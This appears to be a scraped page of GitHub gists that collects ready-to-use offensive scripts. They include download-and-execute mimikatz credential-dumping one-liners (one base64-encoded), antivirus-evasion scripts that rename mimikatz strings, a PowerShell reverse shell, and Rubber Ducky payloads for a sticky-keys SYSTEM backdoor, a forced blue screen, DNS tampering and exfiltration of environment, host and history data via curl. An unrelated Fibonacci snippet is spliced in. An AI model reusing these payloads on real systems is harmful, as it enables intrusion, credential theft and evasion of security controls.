*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
JonnyBanana / Easy Fibonacci Sequence Calculator
Last active Apr 8, 2018
Easy Fibonacci Sequence Calculator in Python
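# Print the Fibonacci numbers that are strictly below `limit`, one per line.
# Set `limit` to the maximum value you want the sequence to reach; the
# original placeholder ("WRITE THE MAXIMUM NUMBER OF THE SEQUENCE") was not
# valid Python and the loop body was not indented.
limit = 1000000  # change this to the upper bound you want
a, b = 0, 1
while b < limit:
    print(b)
    # advance the pair (F(n-1), F(n)) -> (F(n), F(n+1))
    a, b = b, a + b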
### EXAMPLE, CALCULATE THE SEQUENCE UP TO NUMBER 1000000 ###
a,b=0,1
while(b < 1000000):
View mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
JonnyBanana / Quick-Invoke-BSOD
Created Apr 8, 2018
Invoke a BSOD ("the Blue Screen of Death") from Windows PowerShell
*NOTE - invoke BSOD "the Blue Screen of Death": I have taken this script from here: https://github.com/peewpw/Invoke-BSOD*
PS>IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD
JonnyBanana / invoke_evasion.sh
Created Apr 8, 2018 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers on Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
View Blue Screener
REM Title: BlueScreener
REM Note: Cheap and easy way to force a kernel panic (BSoD) in Windows
DELAY 4000
CONTROL ESCAPE
DELAY 200
STRING powershell
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 600
View StickyWindowsBackdoor
REM Note: Adjust delays to match host CPU speed
REM To Undo: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
REM Desc: Adds a registry entry to enable the classic sticky keys SYSTEM level cmd backdoor
REM UAC CMD Bypass
DELAY 2000
CONTROL ESCAPE
DELAY 300
STRING cmd
CTRL-SHIFT ENTER
View Powershell_Reverse_Shell
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient("192.168.1.15",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#$sm=(New-Object Net.Sockets.TCPClient("192.168.1.15",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
View exfiltrate some infos...
REM Exfiltrate various useful information.
REM To capture, run `nc -l 9999`.
REM Make sure to update the hostname before using it.
DELAY 1000
ALT F2
DELAY 100
STRING sh -c "{ printf 'Hostname: '; hostname; echo; printf 'uname: '; uname -a; echo; echo Env:; env; echo; echo Network:; nmcli; echo; /sbin/ifconfig -a; echo '/etc/hosts:'; cat /etc/hosts; echo; echo Mounts:; mount; echo; echo 'Running services:'; netstat -tunlpe; echo; echo 'Installed packages:'; dpkg -l || dnf list --installed || pacman -Ql; echo; echo 'Command history:'; history; echo; } | curl -F data='<-' http://eternal-pickle:9999"
ENTER
View networkmanager-dns-mitm
REM Set up a DNS-based MITM attack.
DELAY 1000
ALT F2
DELAY 100
STRING sh -c 'function mitm() { for ((i=0;i<10;i++)); do nmcli connection modify "$1" -ipv4.dns 0; done; nmcli connection modify "$1" +ipv4.dns 8.8.8.8; }; for x in $(nmcli -t connection show --active | cut -d: -f1); do mitm "$x"; done;'
ENTER